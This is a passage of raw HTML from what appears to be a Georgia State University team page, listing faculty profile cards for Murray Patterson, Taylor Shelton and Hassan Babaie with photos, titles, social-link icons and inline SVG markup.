11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c46-outer\">\n            <div data-colibri-id=\"182-c46\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c46 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c47\" class=\"d-block style-973 style-local-182-c47 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-cropped-patterson-e1697143515399.jpg\" class=\"wp-image-1679 style-973-image style-local-182-c47-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c47-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c48\" class=\"h-global-transition-all h-heading style-974 style-local-182-c48 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c48\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Murray Patterson</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c49\" class=\"h-text h-text-component style-975 style-local-182-c49 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Assistant Professor&nbsp;</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c50\" class=\"h-text h-text-component style-976 style-local-182-c50 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c51\" class=\"style-977 style-local-182-c51 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c52-outer\">\n            <div data-colibri-id=\"182-c52\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c52 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c53\" class=\"d-block style-973 style-local-182-c53 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Taylor-shelton_300x300-e1697143561739.jpeg\" class=\"wp-image-1681 style-973-image style-local-182-c53-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c53-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c54\" class=\"h-global-transition-all h-heading style-974 style-local-182-c54 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c54\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Taylor Shelton</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c55\" class=\"h-text h-text-component style-975 style-local-182-c55 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c56\" class=\"h-text h-text-component style-976 style-local-182-c56 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c57\" class=\"style-977 style-local-182-c57 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c58-outer\">\n            <div data-colibri-id=\"182-c58\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c58 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c59\" class=\"d-block style-973 style-local-182-c59 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-Hassan-Babaie-300x300-1-e1697143646400.jpg\" class=\"wp-image-1682 style-973-image style-local-182-c59-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c59-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c60\" class=\"h-global-transition-all h-heading style-974 style-local-182-c60 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c60\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Hassan Babaie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c61\" class=\"h-text h-text-component style-975 style-local-182-c61 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c62\" class=\"h-text h-text-component style-976 style-local-182-c62 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c63\" class=\"style-977 style-local-182-c63 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://geosciences.gsu.edu/profile/hassan-babaie/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Hassan-Babaie/4\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 